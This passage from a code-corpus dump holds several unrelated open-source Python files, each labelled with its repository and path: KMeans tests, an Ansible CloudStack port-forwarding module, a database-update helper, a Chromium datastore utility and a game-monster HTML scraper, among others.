n_init=1).fit(X_list), KMeans(n_clusters=2, init=init_int, n_init=1).fit(X_int), # mini batch kmeans is very unstable on such a small dataset hence # we use many inits MiniBatchKMeans(n_clusters=2, n_init=10, batch_size=2).fit(X_list), MiniBatchKMeans(n_clusters=2, n_init=10, batch_size=2).fit(X_int), MiniBatchKMeans(n_clusters=2, n_init=10, batch_size=2).fit(X_int_csr), MiniBatchKMeans(n_clusters=2, batch_size=2, init=init_int, n_init=1).fit(X_list), MiniBatchKMeans(n_clusters=2, batch_size=2, init=init_int, n_init=1).fit(X_int), MiniBatchKMeans(n_clusters=2, batch_size=2, init=init_int, n_init=1).fit(X_int_csr), ] expected_labels = [0, 1, 1, 0, 0, 1] scores = np.array([v_measure_score(expected_labels, km.labels_) for km in fitted_models]) assert_array_equal(scores, np.ones(scores.shape[0])) def test_transform(): km = KMeans(n_clusters=n_clusters) km.fit(X) X_new = km.transform(km.cluster_centers_) for c in range(n_clusters): assert_equal(X_new[c, c], 0) for c2 in range(n_clusters): if c != c2: assert_greater(X_new[c, c2], 0) def test_fit_transform(): X1 = KMeans(n_clusters=3, random_state=51).fit(X).transform(X) X2 = KMeans(n_clusters=3, random_state=51).fit_transform(X) assert_array_equal(X1, X2) def test_n_init(): # Check that increasing the number of init increases the quality n_runs = 5 n_init_range = [1, 5, 10] inertia = np.zeros((len(n_init_range), n_runs)) for i, n_init in enumerate(n_init_range): for j in range(n_runs): km = KMeans(n_clusters=n_clusters, init="random", n_init=n_init, random_state=j).fit(X) inertia[i, j] = km.inertia_ inertia = inertia.mean(axis=1) failure_msg = ("Inertia %r should be decreasing" " when n_init is increasing.") % list(inertia) for i in range(len(n_init_range) - 1): assert_true(inertia[i] >= inertia[i + 1], failure_msg) def test_k_means_function(): # test calling the k_means function directly # catch output old_stdout = sys.stdout sys.stdout = StringIO() try: cluster_centers, labels, inertia = k_means(X, n_clusters=n_clusters, verbose=True) finally: sys.stdout = old_stdout centers = cluster_centers assert_equal(centers.shape, (n_clusters, n_features)) labels = labels assert_equal(np.unique(labels).shape[0], n_clusters) # check that the labels assignment are perfect (up to a permutation) assert_equal(v_measure_score(true_labels, labels), 1.0) assert_greater(inertia, 0.0) # check warning when centers are passed assert_warns(RuntimeWarning, k_means, X, n_clusters=n_clusters, init=centers) # to many clusters desired assert_raises(ValueError, k_means, X, n_clusters=X.shape[0] + 1)
jtrobec/pants
refs/heads/master
src/python/pants/base/parse_context.py
20
# coding=utf-8 # Copyright 2014 Pants project contributors (see CONTRIBUTORS.md). # Licensed under the Apache License, Version 2.0 (see LICENSE). from __future__ import (absolute_import, division, generators, nested_scopes, print_function, unicode_literals, with_statement) class ParseContext(object): """The build file context that context aware objects - aka BUILD macros - operate against.""" def __init__(self, rel_path, type_aliases): self._rel_path = rel_path self._type_aliases = type_aliases def create_object(self, alias, *args, **kwargs): """Constructs the type with the given alias using the given args and kwargs. NB: aliases may be the alias' object type itself if that type is known. :param alias: Either the type alias or the type itself. :type alias: string|type :param *args: These pass through to the underlying callable object. :param **kwargs: These pass through to the underlying callable object. :returns: The created object. """ object_type = self._type_aliases.get(alias) if object_type is None: raise KeyError('There is no type registered for alias {0}'.format(alias)) return object_type(*args, **kwargs) @property def rel_path(self): """Relative path from the build root to the BUILD file the context aware object is called in. :rtype string """ return self._rel_path
davidlmorton/spikepy
refs/heads/master
spikepy/builtins/visualizations/rasters.py
1
# Copyright (C) 2012 David Morton # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. import numpy from spikepy.developer.visualization import Visualization from spikepy.plotting_utils.general import create_times_array, as_fraction from spikepy.plotting_utils.make_into_publication_axes import \ make_into_publication_axes, update_scalebars from spikepy.common.valid_types import ValidFloat, ValidBoolean, ValidOption,\ ValidInteger background = {True:'black', False:'white'} foreground = {True:'white', False:'black'} colors = {True:['cyan', 'magenta', 'yellow'], False:['red', 'green', 'blue']} class EventRasterVisualization(Visualization): name = 'Event Raster(s)' requires = ['df_traces', 'df_sampling_freq'] found_under_tab = 'detection' channel_separation_std = ValidFloat(0.1, 100.0, default=8.0, description='How far apart the channels are plotted (as a multiple of the standard deviation of the signal).') invert_colors = ValidBoolean(default=False) raster_position = ValidOption('peak', 'center', default='center') raster_size = ValidInteger(1, 1000, default=20, description='Size of raster tick marks in pixels.') trace_opacity = ValidFloat(0.0, 1.0, default=0.25, description='How darkly the traces are plotted.') def _plot(self, trial, figure, channel_separation_std=8.0, invert_colors=False, raster_position='center', raster_size=20, trace_opacity=0.25): f_traces = trial.df_traces.data f_sf = trial.df_sampling_freq.data f_times = create_times_array(f_traces, f_sf) if hasattr(trial, 'event_times'): event_times = trial.event_times.data else: event_times = None have_event_times = (event_times is not None) def as_frac(x=None, y=None): f = figure canvas_size_in_pixels = (f.get_figwidth()*f.get_dpi(), f.get_figheight()*f.get_dpi()) return as_fraction(x=x, y=y, canvas_size_in_pixels=canvas_size_in_pixels) figure.set_facecolor(background[invert_colors]) figure.set_edgecolor(foreground[invert_colors]) figure.subplots_adjust(left=as_frac(x=75), right=1.0-as_frac(x=10), bottom=as_frac(y=30), top=1.0-as_frac(y=10)) channel_separation = numpy.std(f_traces[0]) * channel_separation_std axes = figure.add_subplot(111) axes.set_axis_bgcolor(background[invert_colors]) make_into_publication_axes(axes, base_unit_prefix=('', 'm'), scale_bar_origin_frac=as_frac(-25, -5), target_size_frac=as_frac(150, 80), y_label_rotation='vertical', color=foreground[invert_colors]) axes.lock_axes() # plot traces offsets = [] y_mins = [] y_maxs = [] for i, f_trace in enumerate(f_traces): offset = -i*channel_separation offsets.append(offset) y_values = f_trace+offset y_mins.append(numpy.min(y_values)) y_maxs.append(numpy.max(y_values)) axes.signal_plot(f_times, y_values, color=foreground[invert_colors], alpha=trace_opacity) axes.set_ylabel('Channel', color=foreground[invert_colors]) axes.set_yticks(offsets) axes.set_yticklabels([str((i+1)) for i in range(len(offsets))], color=foreground[invert_colors]) y_min = min(y_mins) y_max = max(y_maxs) y_range = y_max - y_min if have_event_times: for i, event_sequence in enumerate(event_times): if len(event_sequence) > 0: color = colors[invert_colors][i%len(colors[invert_colors])] e_xs = event_sequence if raster_position == 'center': e_ys = [offsets[i] for e in e_xs] else: # 0.1 corrects for roundoff error event_indexes = [int(f_sf*e+0.1) for e in e_xs] e_ys = [f_traces[i][ei]+offsets[i] for ei in event_indexes] axes.plot(numpy.array(e_xs), numpy.array(e_ys), linewidth=0, marker='|', markersize=raster_size, color=color, markeredgewidth=2) axes.unlock_axes() axes.set_xlim(f_times[0], f_times[-1]) axes.set_ylim((y_min - 0.03*y_range, y_max + 0.20*y_range)) self.axes = axes class FeatureRasterVisualization(EventRasterVisualization): name = 'Feature Raster' requires = ['df_traces', 'df_sampling_freq', 'event_times'] found_under_tab = 'extraction' channel_separation_std = ValidFloat(0.1, 100.0, default=8.0, description='How far apart the channels are plotted (as a multiple of the standard deviation of the signal).') invert_colors = ValidBoolean(default=False) event_raster_position = ValidOption('peak', 'center', default='center') raster_position = None event_raster_size = ValidInteger(1, 1000, default=20, description='Size of event raster tick marks in pixels.') raster_size = None feature_raster_position = ValidOption('top', 'middle', 'bottom', default='top') feature_raster_size = ValidInteger(1, 1000, default=20, description='Size of feature raster tick marks in pixels.') trace_opacity = ValidFloat(0.0, 1.0, default=0.25, description='How darkly the traces are plotted.') def _plot(self, trial, figure, channel_separation_std=8.0, invert_colors=False, event_raster_position='center', event_raster_size=20, feature_raster_position='top', feature_raster_size=50, trace_opacity=0.25): # call parent's _plot first. EventRasterVisualization._plot(self, trial, figure, channel_separation_std=channel_separation_std, invert_colors=invert_colors, raster_size=event_raster_size, raster_position=event_raster_position, trace_opacity=trace_opacity) # if possible, plot feature raster. if (hasattr(trial, 'features') and trial.features.data is not None and hasattr(trial, 'feature_times') and trial.feature_times.data is not None): self.axes.lock_axes() ymin, ymax = self.axes.get_ylim() positions = {'top':ymax, 'bottom':ymin, 'middle':(ymax+ymin)/2.0} ft = trial.feature_times.data self.axes.plot(ft, numpy.ones(len(ft))*positions[feature_raster_position], linewidth=0, marker='|', markersize=feature_raster_size, color=foreground[invert_colors], markeredgewidth=2) self.axes.unlock_axes()
pshowalter/solutions-geoprocessing-toolbox
refs/heads/dev
utils/test/clearing_operations_tests/ClearingOperationsCanvasAreaGRGTestCase.py
1
#------------------------------------------------------------------------------ # Copyright 2017 Esri # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. #------------------------------------------------------------------------------ import logging import arcpy from arcpy.sa import * import sys import traceback import datetime import os # Add parent folder to python path if running test case standalone import sys sys.path.append(os.path.normpath(os.path.join(os.path.dirname(__file__), '..'))) import unittest import Configuration import UnitTestUtilities import DataDownload class ClearingOperationsCanvasAreaGRGTestCase(unittest.TestCase): toolboxUnderTest = None # Set to Pro or ArcMap toolbox at runtime inputArea = None output = None scratchGDB = None def setUp(self): if Configuration.DEBUG == True: print(" ClearingOperationsCanvasAreaGRGTestCase.setUp") ''' Initialization needed if running Test Case standalone ''' Configuration.GetLogger() Configuration.GetPlatform() ''' End standalone initialization ''' self.toolboxUnderTest = Configuration.clearingOperationsToolboxPath + \ Configuration.GetToolboxSuffix() UnitTestUtilities.checkArcPy() DataDownload.runDataDownload(Configuration.clearingOperationsPath, \ Configuration.clearingOperationsInputGDB, Configuration.clearingOperationsURL) if (self.scratchGDB == None) or (not arcpy.Exists(self.scratchGDB)): self.scratchGDB = UnitTestUtilities.createScratch(Configuration.clearingOperationsPath) # set up inputs self.inputArea = os.path.join(Configuration.clearingOperationsInputGDB, r"AO") UnitTestUtilities.checkFilePaths([Configuration.clearingOperationsPath]) UnitTestUtilities.checkGeoObjects([Configuration.clearingOperationsInputGDB, self.toolboxUnderTest, self.scratchGDB, self.inputArea]) def tearDown(self): if Configuration.DEBUG == True: print(" ClearingOperationsTestCase.tearDown") UnitTestUtilities.deleteScratch(self.scratchGDB) def testClearingOperationsAreaGRG(self): if Configuration.DEBUG == True:print(".....ClearingOperationsCanvasAreaGRGTestCase.testClearingOperationsAreaGRG") print("Importing toolbox...") arcpy.ImportToolbox(self.toolboxUnderTest) arcpy.env.overwriteOutput = True #inputs cellWidth = 100 cellHeight = 100 cellunits = "Meters" labelStart = "Lower-Left" labelStyle = "Alpha-Numeric" output = os.path.join(self.scratchGDB, "grg") #Testing runToolMsg="Running tool (Canvas Area GRG)" arcpy.AddMessage(runToolMsg) Configuration.Logger.info(runToolMsg) try: # Calling the CanvasAreaGRG_ClearingOperations Script Tool arcpy.CanvasAreaGRG_ClearingOperations(self.inputArea, cellWidth, cellHeight, cellunits, labelStart, labelStyle, output) except arcpy.ExecuteError: UnitTestUtilities.handleArcPyError() except: UnitTestUtilities.handleGeneralError() result = arcpy.GetCount_management(output) count = int(result.getOutput(0)) print("number features: " + str(count)) self.assertEqual(count, 40) if __name__ == "__main__": unittest.main()
preo/ansible-modules-extras
refs/heads/devel
cloud/cloudstack/cs_portforward.py
7
#!/usr/bin/python # -*- coding: utf-8 -*- # # (c) 2015, René Moser <mail@renemoser.net> # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. DOCUMENTATION = ''' --- module: cs_portforward short_description: Manages port forwarding rules on Apache CloudStack based clouds. description: - Create, update and remove port forwarding rules. version_added: '2.0' author: "René Moser (@resmo)" options: ip_address: description: - Public IP address the rule is assigned to. required: true vm: description: - Name of virtual machine which we make the port forwarding rule for. - Required if C(state=present). required: false default: null state: description: - State of the port forwarding rule. required: false default: 'present' choices: [ 'present', 'absent' ] protocol: description: - Protocol of the port forwarding rule. required: false default: 'tcp' choices: [ 'tcp', 'udp' ] public_port: description: - Start public port for this rule. required: true public_end_port: description: - End public port for this rule. - If not specified equal C(public_port). required: false default: null private_port: description: - Start private port for this rule. required: true private_end_port: description: - End private port for this rule. - If not specified equal C(private_port). required: false default: null open_firewall: description: - Whether the firewall rule for public port should be created, while creating the new rule. - Use M(cs_firewall) for managing firewall rules. required: false default: false vm_guest_ip: description: - VM guest NIC secondary IP address for the port forwarding rule. required: false default: false domain: description: - Domain the C(vm) is related to. required: false default: null account: description: - Account the C(vm) is related to. required: false default: null project: description: - Name of the project the C(vm) is located in. required: false default: null zone: description: - Name of the zone in which the virtual machine is in. - If not set, default zone is used. required: false default: null poll_async: description: - Poll async jobs until job has finished. required: false default: true extends_documentation_fragment: cloudstack ''' EXAMPLES = ''' # 1.2.3.4:80 -> web01:8080 - local_action: module: cs_portforward ip_address: 1.2.3.4 vm: web01 public_port: 80 private_port: 8080 # forward SSH and open firewall - local_action: module: cs_portforward ip_address: '{{ public_ip }}' vm: '{{ inventory_hostname }}' public_port: '{{ ansible_ssh_port }}' private_port: 22 open_firewall: true # forward DNS traffic, but do not open firewall - local_action: module: cs_portforward ip_address: 1.2.3.4 vm: '{{ inventory_hostname }}' public_port: 53 private_port: 53 protocol: udp open_firewall: true # remove ssh port forwarding - local_action: module: cs_portforward ip_address: 1.2.3.4 public_port: 22 private_port: 22 state: absent ''' RETURN = ''' --- ip_address: description: Public IP address. returned: success type: string sample: 1.2.3.4 protocol: description: Protocol. returned: success type: string sample: tcp private_port: description: Start port on the virtual machine's IP address. returned: success type: int sample: 80 private_end_port: description: End port on the virtual machine's IP address. returned: success type: int public_port: description: Start port on the public IP address. returned: success type: int sample: 80 public_end_port: description: End port on the public IP address. returned: success type: int sample: 80 tags: description: Tags related to the port forwarding. returned: success type: list sample: [] vm_name: description: Name of the virtual machine. returned: success type: string sample: web-01 vm_display_name: description: Display name of the virtual machine. returned: success type: string sample: web-01 vm_guest_ip: description: IP of the virtual machine. returned: success type: string sample: 10.101.65.152 ''' try: from cs import CloudStack, CloudStackException, read_config has_lib_cs = True except ImportError: has_lib_cs = False # import cloudstack common from ansible.module_utils.cloudstack import * class AnsibleCloudStackPortforwarding(AnsibleCloudStack): def __init__(self, module): AnsibleCloudStack.__init__(self, module) self.portforwarding_rule = None self.vm_default_nic = None def get_public_end_port(self): if not self.module.params.get('public_end_port'): return self.module.params.get('public_port') return self.module.params.get('public_end_port') def get_private_end_port(self): if not self.module.params.get('private_end_port'): return self.module.params.get('private_port') return self.module.params.get('private_end_port') def get_vm_guest_ip(self): vm_guest_ip = self.module.params.get('vm_guest_ip') default_nic = self.get_vm_default_nic() if not vm_guest_ip: return default_nic['ipaddress'] for secondary_ip in default_nic['secondaryip']: if vm_guest_ip == secondary_ip['ipaddress']: return vm_guest_ip self.module.fail_json(msg="Secondary IP '%s' not assigned to VM" % vm_guest_ip) def get_vm_default_nic(self): if self.vm_default_nic: return self.vm_default_nic nics = self.cs.listNics(virtualmachineid=self.get_vm(key='id')) if nics: for n in nics['nic']: if n['isdefault']: self.vm_default_nic = n return self.vm_default_nic self.module.fail_json(msg="No default IP address of VM '%s' found" % self.module.params.get('vm')) def get_portforwarding_rule(self): if not self.portforwarding_rule: protocol = self.module.params.get('protocol') public_port = self.module.params.get('public_port') public_end_port = self.get_public_end_port() private_port = self.module.params.get('private_port') private_end_port = self.get_public_end_port() args = {} args['ipaddressid'] = self.get_ip_address(key='id') args['projectid'] = self.get_project(key='id') portforwarding_rules = self.cs.listPortForwardingRules(**args) if portforwarding_rules and 'portforwardingrule' in portforwarding_rules: for rule in portforwarding_rules['portforwardingrule']: if protocol == rule['protocol'] \ and public_port == int(rule['publicport']): self.portforwarding_rule = rule break return self.portforwarding_rule def present_portforwarding_rule(self): portforwarding_rule = self.get_portforwarding_rule() if portforwarding_rule: portforwarding_rule = self.update_portforwarding_rule(portforwarding_rule) else: portforwarding_rule = self.create_portforwarding_rule() return portforwarding_rule def create_portforwarding_rule(self): args = {} args['protocol'] = self.module.params.get('protocol') args['publicport'] = self.module.params.get('public_port') args['publicendport'] = self.get_public_end_port() args['privateport'] = self.module.params.get('private_port') args['privateendport'] = self.get_private_end_port() args['openfirewall'] = self.module.params.get('open_firewall') args['vmguestip'] = self.get_vm_guest_ip() args['ipaddressid'] = self.get_ip_address(key='id') args['virtualmachineid'] = self.get_vm(key='id') portforwarding_rule = None self.result['changed'] = True if not self.module.check_mode: portforwarding_rule = self.cs.createPortForwardingRule(**args) poll_async = self.module.params.get('poll_async') if poll_async: portforwarding_rule = self._poll_job(portforwarding_rule, 'portforwardingrule') return portforwarding_rule def update_portforwarding_rule(self, portforwarding_rule): args = {} args['protocol'] = self.module.params.get('protocol') args['publicport'] = self.module.params.get('public_port') args['publicendport'] = self.get_public_end_port() args['privateport'] = self.module.params.get('private_port') args['privateendport'] = self.get_private_end_port() args['openfirewall'] = self.module.params.get('open_firewall') args['vmguestip'] = self.get_vm_guest_ip() args['ipaddressid'] = self.get_ip_address(key='id') args['virtualmachineid'] = self.get_vm(key='id') if self._has_changed(args, portforwarding_rule): self.result['changed'] = True if not self.module.check_mode: # API broken in 4.2.1?, workaround using remove/create instead of update # portforwarding_rule = self.cs.updatePortForwardingRule(**args) self.absent_portforwarding_rule() portforwarding_rule = self.cs.createPortForwardingRule(**args) poll_async = self.module.params.get('poll_async') if poll_async: portforwarding_rule = self._poll_job(portforwarding_rule, 'portforwardingrule') return portforwarding_rule def absent_portforwarding_rule(self): portforwarding_rule = self.get_portforwarding_rule() if portforwarding_rule: self.result['changed'] = True args = {} args['id'] = portforwarding_rule['id'] if not self.module.check_mode: res = self.cs.deletePortForwardingRule(**args) poll_async = self.module.params.get('poll_async') if poll_async: self._poll_job(res, 'portforwardingrule') return portforwarding_rule def get_result(self, portforwarding_rule): if portforwarding_rule: if 'id' in portforwarding_rule: self.result['id'] = portforwarding_rule['id'] if 'virtualmachinedisplayname' in portforwarding_rule: self.result['vm_display_name'] = portforwarding_rule['virtualmachinedisplayname'] if 'virtualmachinename' in portforwarding_rule: self.result['vm_name'] = portforwarding_rule['virtualmachinename'] if 'ipaddress' in portforwarding_rule: self.result['ip_address'] = portforwarding_rule['ipaddress'] if 'vmguestip' in portforwarding_rule: self.result['vm_guest_ip'] = portforwarding_rule['vmguestip'] if 'publicport' in portforwarding_rule: self.result['public_port'] = int(portforwarding_rule['publicport']) if 'publicendport' in portforwarding_rule: self.result['public_end_port'] = int(portforwarding_rule['publicendport']) if 'privateport' in portforwarding_rule: self.result['private_port'] = int(portforwarding_rule['privateport']) if 'privateendport' in portforwarding_rule: self.result['private_end_port'] = int(portforwarding_rule['privateendport']) if 'protocol' in portforwarding_rule: self.result['protocol'] = portforwarding_rule['protocol'] if 'tags' in portforwarding_rule: self.result['tags'] = [] for tag in portforwarding_rule['tags']: result_tag = {} result_tag['key'] = tag['key'] result_tag['value'] = tag['value'] self.result['tags'].append(result_tag) return self.result def main(): module = AnsibleModule( argument_spec = dict( ip_address = dict(required=True), protocol= dict(choices=['tcp', 'udp'], default='tcp'), public_port = dict(type='int', required=True), public_end_port = dict(type='int', default=None), private_port = dict(type='int', required=True), private_end_port = dict(type='int', default=None), state = dict(choices=['present', 'absent'], default='present'), open_firewall = dict(choices=BOOLEANS, default=False), vm_guest_ip = dict(default=None), vm = dict(default=None), zone = dict(default=None), domain = dict(default=None), account = dict(default=None), project = dict(default=None), poll_async = dict(choices=BOOLEANS, default=True), api_key = dict(default=None), api_secret = dict(default=None, no_log=True), api_url = dict(default=None), api_http_method = dict(choices=['get', 'post'], default='get'), api_timeout = dict(type='int', default=10), ), required_together = ( ['api_key', 'api_secret', 'api_url'], ), supports_check_mode=True ) if not has_lib_cs: module.fail_json(msg="python library cs required: pip install cs") try: acs_pf = AnsibleCloudStackPortforwarding(module) state = module.params.get('state') if state in ['absent']: pf_rule = acs_pf.absent_portforwarding_rule() else: pf_rule = acs_pf.present_portforwarding_rule() result = acs_pf.get_result(pf_rule) except CloudStackException, e: module.fail_json(msg='CloudStackException: %s' % str(e)) module.exit_json(**result) # import module snippets from ansible.module_utils.basic import * if __name__ == '__main__': main()
Eloston/nsmb-tools
refs/heads/master
classidtool/libupdate.py
1
''' This file is part of nsmb-tools. nsmb-tools is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. nsmb-tools is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with nsmb-tools. If not, see <http://www.gnu.org/licenses/>. ''' # ClassID Tool # NameDatabase updating module import urllib.request import re def update_namedatabase(namedatabase_path, urllist_path): ''' Update NameDatabase file ''' try: regexp = re.compile(r"\{(?P<URLName>.+)\#(?P<URL>.+)\}") with open(urllist_path, "r") as file_obj: re_match = regexp.match(file_obj.read()) if re_match == None: raise Exception("URLList is in an invalid format") else: if re_match.group("URLName") == "NameDatabase_Update": namedatabase_url = re_match.group("URL") else: raise Exception("Could not find URL for `NameDatabase_Update` in URLList") except Exception as e: return ("urllist-parse-failure", str(e)) try: http_obj = urllib.request.urlopen(namedatabase_url) new_namedatabase = http_obj.read() http_obj.close() except Exception as e: return ("download-failure", str(e)) try: with open(namedatabase_path, 'wb') as file_obj: file_obj.write(new_namedatabase) except Exception as e: return ("write-failure", str(e)) return ("success", None)
svfat/django-tutorial-bugreport
refs/heads/master
manage.py
404
#!/usr/bin/env python import os import sys if __name__ == "__main__": os.environ.setdefault("DJANGO_SETTINGS_MODULE", "project.settings") from django.core.management import execute_from_command_line execute_from_command_line(sys.argv)
hgl888/chromium-crosswalk
refs/heads/master
chrome/common/extensions/docs/server2/datastore_util.py
29
# Copyright 2015 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. import cPickle import googledatastore as datastore import logging from future import Future # N.B.: In order to use this module you should have a working cloud development # environment configured with the googledatastore module installed. # # Please see https://cloud.google.com/datastore/docs/getstarted/start_python/ _DATASET_NAME = 'chrome-apps-doc' _PERSISTENT_OBJECT_KIND = 'PersistentObjectStoreItem' _VALUE_PROPERTY_NAME = 'pickled_value' # The max number of entities to include in a single request. This is capped at # 500 by the service. In practice we may send fewer due to _MAX_REQUEST_SIZE _MAX_BATCH_SIZE = 500 # The maximum entity size allowed by Datastore. _MAX_ENTITY_SIZE = 1024*1024 # The maximum request size (in bytes) to send Datastore. This is an approximate # size based on the sum of entity blob_value sizes. _MAX_REQUEST_SIZE = 5*1024*1024 def _CreateEntity(name, value): entity = datastore.Entity() path = entity.key.path_element.add() path.kind = _PERSISTENT_OBJECT_KIND path.name = name pickled_value_property = entity.property.add() pickled_value_property.name = _VALUE_PROPERTY_NAME pickled_value_property.value.indexed = False pickled_value_property.value.blob_value = value return entity def _CreateBatches(data): '''Constructs batches of at most _MAX_BATCH_SIZE entities to cover all entities defined in |data| without exceeding the transaction size limit. This is a generator emitting lists of entities. ''' def get_size(entity): return len(entity.property[0].value.blob_value) entities = [_CreateEntity(name, value) for name, value in data.iteritems()] batch_start = 0 batch_end = 1 batch_size = get_size(entities[0]) while batch_end < len(entities): next_size = get_size(entities[batch_end]) if (batch_size + next_size > _MAX_REQUEST_SIZE or batch_end - batch_start >= _MAX_BATCH_SIZE): yield entities[batch_start:batch_end], batch_end, len(entities) batch_start = batch_end batch_size = 0 else: batch_size += next_size batch_end = batch_end + 1 if batch_end > batch_start and batch_start < len(entities): yield entities[batch_start:batch_end], batch_end, len(entities) def PushData(data, original_data={}): '''Pushes a bunch of data into the datastore. The data should be a dict. Each key is treated as a namespace, and each value is also a dict. A new datastore entry is upserted for every inner key, with the value pickled into the |pickled_value| field. For example, if given the dictionary: { 'fruit': { 'apple': 1234, 'banana': 'yellow', 'trolling carrot': { 'arbitrarily complex': ['value', 'goes', 'here'] } }, 'animal': { 'sheep': 'baaah', 'dog': 'woof', 'trolling cat': 'moo' } } this would result in a push of 6 keys in total, with the following IDs: Key('PersistentObjectStoreItem', 'fruit/apple') Key('PersistentObjectStoreItem', 'fruit/banana') Key('PersistentObjectStoreItem', 'fruit/trolling carrot') Key('PersistentObjectStoreItem', 'animal/sheep') Key('PersistentObjectStoreItem', 'animal/dog') Key('PersistentObjectStoreItem', 'animal/trolling cat') If given |original_data|, this will only push key-value pairs for entries that are either new or have changed from their original (pickled) value. Caveat: Pickling and unpickling a dictionary can (but does not always) change its key order. This means that objects will often be seen as changed even when they haven't changed. ''' datastore.set_options(dataset=_DATASET_NAME) def flatten(dataset): flat = {} for namespace, items in dataset.iteritems(): for k, v in items.iteritems(): flat['%s/%s' % (namespace, k)] = cPickle.dumps(v) return flat logging.info('Flattening data sets...') data = flatten(data) original_data = flatten(original_data) logging.info('Culling new data...') for k in data.keys(): if ((k in original_data and original_data[k] == data[k]) or (len(data[k]) > _MAX_ENTITY_SIZE)): del data[k] for batch, n, total in _CreateBatches(data): commit_request = datastore.CommitRequest() commit_request.mode = datastore.CommitRequest.NON_TRANSACTIONAL commit_request.mutation.upsert.extend(list(batch)) logging.info('Committing %s/%s entities...' % (n, total)) datastore.commit(commit_request)
ReamerKim/pad_crawling
refs/heads/master
model/Monster.py
1
#!/usr/bin/env python # -*- coding: utf-8 -*- import urllib import re import requests import json _no = re.compile(r"""<div class="no">No. ([^<]+)</div>"""); _name = re.compile(r"""<div class="name">([^<]+)</div>""") _icon = re.compile(r"""<img class="imgicon" src="([^"]+)" /></div>""") _cost = re.compile(r"""<div class="cost"><dl><dt>[^<]+</dt><dd>([^<]+)</dd>""") _exp = re.compile(r"""<div class="exp"><dl><dt>[^<]+</dt><dd style="width: 92px;"><span style="float:left;">([^<]+)</span> """); _status= re.compile(r"""<div class="block stateInfo">([^@]{3,5000}?)</div>"""); _attr= re.compile(r"""fonticon_attr_([\d]+)"""); _type=re.compile(r"""fonticon/fonticon_type_([\d]+)"""); _skill = re.compile(r"""<div class="block skillInfo">([^@]+)<div class="block awakenInfo">"""); _awakeSkill = re.compile(r"""<div class="block awakenInfo">([^@]{3,5000}?)</div>"""); ''' Get monster data from inven json structure monstercode: int maxattack: int monsterattribute: int recoverymod: str monstername: unicode exptype: int needexp: int hpmod: str attack: int exp: int maxhp: int maxrecovery: int attackmod: str maxlevel: int hp: int recovery: int ''' def get_monster_default_data(monster_num): data = { 'code': '%d'%monster_num, 'mode': '2' } url = r"""http://m.inven.co.kr/site/pad/monster_info.ajax.php""" r = requests.post(url,data=data) t = r.text rst = json.loads(t) return rst; def get_charactor_num(uni_c): com = re.compile(_no); rst = com.findall(uni_c) if len(rst) != 0: return int(rst[0],10) else: raise Exception("ERROR") def get_charactor_name(uni_c): com = re.compile(_name); rst = com.findall(uni_c) if len(rst) != 0: return rst[0] else: raise Exception("ERROR") def get_charactor_icon_url(uni_c): com = re.compile(_icon); rst = com.findall(uni_c) if len(rst) != 0: return rst[0] else: raise Exception("ERROR") def get_charactor_cost(uni_c): com = re.compile(_cost); rst = com.findall(uni_c) if len(rst) != 0: return int(rst[0]) else: raise Exception("ERROR") def get_charactor_exp(uni_c): com = re.compile(_exp); rst = com.findall(uni_c) if len(rst) != 0: return int(rst[0].replace(",","")) else: raise Exception("ERROR") def get_charactor_status(uni_c): # return Max_Lv, min_hp, max_hp, min_attack, max_attack, min_heal, max_heal com = re.compile(_status); rst = com.findall(uni_c) com2 = re.compile(r"""th>Lv.1</th>\s+<th class="nobg">Lv.([^<]+)</th>\s+</tr>\s+<tr>\s+<td height="26">HP</td>\s+<td>([^<]+)</td>\s+<td class="nobg">([^<]+) <span class="green">[^<]+</span></td>\s+</tr>\s+<tr>\s+<td height="24">[^<]+</td>\s+<td>([^<]+)</td>\s+<td class="nobg">([^<]+) <span class="green">[^<]+</span></td>\s+</tr>\s+<tr>\s+<td height="23">[^<]+</td>\s+<td>([^<]+)</td>\s+<td class="nobg">([^<]+)""") if len(rst) != 0: #require get data from HTML Table r = com2.findall(rst[0]); return int(r[0][0]), int(r[0][1]), int(r[0][2]), int(r[0][3]), int(r[0][4]), int(r[0][5]), int(r[0][6]) else: raise Exception("ERROR") def get_charactor_attr(uni_c): com = re.compile(_attr); rst = com.findall(uni_c) if len(rst) != 0: rr = [] for r in rst: rr.append(int(r)) return rr else: raise Exception("ERROR") def get_charactor_type(uni_c): com = re.compile(_type); rst = com.findall(uni_c) if len(rst) != 0: rr = [] for r in rst: rr.append(int(r)) return rr else: raise Exception("ERROR") class Monster(object): def __init__(self, _no= 0, _name= "None", _cost= 0, _exp= 0, _expType=0, _maxLevel= 0, _minAttackPoint= 0, _maxAttackPoint= 0, _attackPointType= 0, _minHealthPoint= 0, _maxHealthPoint= 0, _healthPointType= 0, _minHealPoint= 0, _maxHealPoint= 0, _healPointType= 0, _mainAttribute= 0, _subAttribute= 0, _mainType= 0, _subType= 0, _skill= 0, _LeaderSKill= 0, _AwakeSkill= "None", _prevEvolution= 0, _nextEvolution= 0, _imageUrl= "None"): self._no = _no; self._name = _name; self._cost = _cost; self._exp = _exp; self._expType 